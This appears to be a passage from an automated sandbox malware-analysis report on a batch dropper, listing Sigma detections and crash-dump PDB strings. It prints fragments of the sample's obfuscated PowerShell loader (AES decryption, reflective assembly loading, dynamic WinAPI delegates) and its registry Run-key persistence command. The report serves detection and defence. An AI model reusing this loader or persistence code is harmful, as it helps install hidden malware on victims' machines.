'$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+'h'+''+'o'+'ds');$skqIwP

Sigma detected: Potential WinAPI Calls Via CommandLine

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+'h'+''+'o'+'ds');$skqIwP

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8184, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 3620, ProcessName: schtasks.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3852, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8184, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3852, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Sigma detected: Powershell Execute Batch Script

Source: Script Block Logging

Author: frack113: Data: EventID: 4104, MessageNumber: 1, MessageTotal: 1, Path: , ScriptBlockId: ee13e47e-a9d9-4f3a-8ad0-aaf9101b1df9, ScriptBlockText: Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden , Source: Microsoft-Windows-PowerShell, data0: 1, data1: 1, data2: Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden , data3: ee13e47e-a9d9-4f3a-8ad0-aaf9101b1df9, data4:

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8184, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{33f9b6db-472d-4fae-86c7-d938bf69b9c0}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 1244, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6112, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 3852, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for domain / URL

Source: azure-winsecure.com

Virustotal: Detection: 8%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.0% probability

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 34_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

34_2_00401000

Source:	Binary string: System.Configuration.Install.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Data.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Core.pdbSystem.Transactions.ni.dlliy source: WER643A.tmp.dmp.27.dr
Source:	Binary string: System.pdbMZ@ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Numerics.pdbp source: WER8767.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdbp source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.DirectoryServices.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdbP source: WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Core.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Numerics.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.DirectoryServices.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Drawing.pdb0 source: WER8767.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Configuration.Install.pdb }b source: WER8767.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: mscorlib.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDB source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Configuration.Install.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: mscorlib.pdb:\W source: WER8767.tmp.dmp.10.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Xml.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.DirectoryServices.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Management.pdbP4 source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Configuration.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Data.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Data.ni.pdbRSDSC source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Windows.Forms.pdb` source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Xml.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Management.Automation.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Data.pdbH source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Management.Automation.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Management.Automation.pdb3 source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Management.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Drawing.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Management.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Core.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Transactions.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Configuration.Install.pdbh source: WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Core.pdbiy source: WER8767.tmp.dmp.10.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdbP source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: System.Transactions.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Powershell.PSReadline.pdb N source: WER643A.tmp.dmp.27.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000002.2995887464.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531273543.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
